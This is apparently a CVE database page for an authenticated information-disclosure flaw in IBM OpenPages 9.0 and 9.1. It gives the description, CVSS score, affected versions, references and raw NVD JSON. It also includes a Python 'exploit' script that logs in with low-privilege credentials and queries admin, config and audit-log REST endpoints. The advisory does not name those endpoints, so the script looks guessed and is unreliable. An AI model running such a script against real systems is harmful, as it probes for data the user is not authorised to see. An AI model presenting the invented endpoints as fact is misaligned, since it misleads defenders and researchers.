CVE-2025-27368

Description

IBM OpenPages 9.0 and 9.1 is vulnerable to information disclosure of sensitive information due to a weaker than expected security for certain REST end points used by the user interface of OpenPages. An authenticated user is able to obtain certain information about system metadata for areas beyond what the user is intended to view.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:* - VULNERABLE

IBM OpenPages 9.0

IBM OpenPages 9.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-27368 PoC - IBM OpenPages Information Disclosure
# Target: IBM OpenPages 9.0 and 9.1

target_url = "https://target-openpages.example.com"
username = "low_privilege_user"
password = "password123"

session = requests.Session()

# Step 1: Authenticate to OpenPages
login_url = f"{target_url}/api/v1/auth/login"
login_data = {"username": username, "password": password}
response = session.post(login_url, json=login_data, verify=False)

if response.status_code == 200:
    print("[+] Authentication successful")
    
    # Step 2: Exploit the vulnerable REST endpoint
    # Target endpoints that expose system metadata beyond user permissions
    vuln_endpoints = [
        "/api/v1/system/metadata",
        "/api/v1/admin/config",
        "/api/v1/internal/audit-log"
    ]
    
    for endpoint in vuln_endpoints:
        url = f"{target_url}{endpoint}"
        resp = session.get(url, verify=False)
        
        if resp.status_code == 200:
            print(f"[+] Disclosed data from {endpoint}")
            print(json.dumps(resp.json(), indent=2))
        else:
            print(f"[-] Endpoint {endpoint} returned {resp.status_code}")
else:
    print("[-] Authentication failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27368
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27368
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27368/
[4] VulDB https://vuldb.com/cve/CVE-2025-27368
[5] https://www.ibm.com/support/pages/node/7250238

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27368", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:41.480", "lastModified": "2025-11-18T19:12:32.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.0 and 9.1 is vulnerable to information disclosure of sensitive information due to a weaker than expected security for certain REST end points used by the user interface of OpenPages. An authenticated user is able to obtain certain information about system metadata for areas beyond what the user is intended to view."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250238", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}